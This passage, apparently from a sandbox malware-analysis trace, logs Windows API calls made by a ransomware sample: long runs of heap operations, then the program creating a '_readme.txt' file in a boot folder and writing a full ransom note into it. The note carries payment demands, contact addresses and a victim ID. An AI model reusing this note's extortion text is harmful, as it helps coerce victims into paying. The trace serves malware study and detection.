hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.903] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.903] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.903] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.903] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.903] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.903] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.903] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.903] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.903] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.903] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.903] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.903] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.904] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.904] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.904] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.904] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.904] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.904] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.904] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.904] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.904] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.904] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.904] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.904] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.905] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.905] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.906] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.906] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.907] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.907] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.908] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.909] PathFindFileNameW (pszPath="C:\\Boot\\pt-PT\\") returned="pt-PT\\" [0090.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.909] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0090.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.909] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0090.909] PathFindFileNameW (pszPath="") returned="" [0090.909] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.909] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0090.910] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0090.910] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0090.910] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0090.910] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99ca4f0 [0090.910] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.910] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.911] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.911] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.911] FreeLibrary (hLibModule=0x75670000) returned 1 [0090.911] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.911] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0090.911] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.911] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.911] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x81c) returned 0x99ca4f0 [0090.911] PathAppendW (in: pszPath="C:\\Boot\\pt-PT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0090.911] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.911] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.911] PathFileExistsW (pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 0 [0090.911] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7d00) returned 0x99f52d8 [0090.912] lstrcpyW (in: lpString1=0x99f52d8, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" [0090.912] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0090.912] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99cad78 [0090.912] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\_readme.txt" (normalized: "c:\\boot\\pt-pt\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0090.912] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0090.912] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x857) returned 0x3189d50 [0090.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x3189d50, cbMultiByte=2135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt 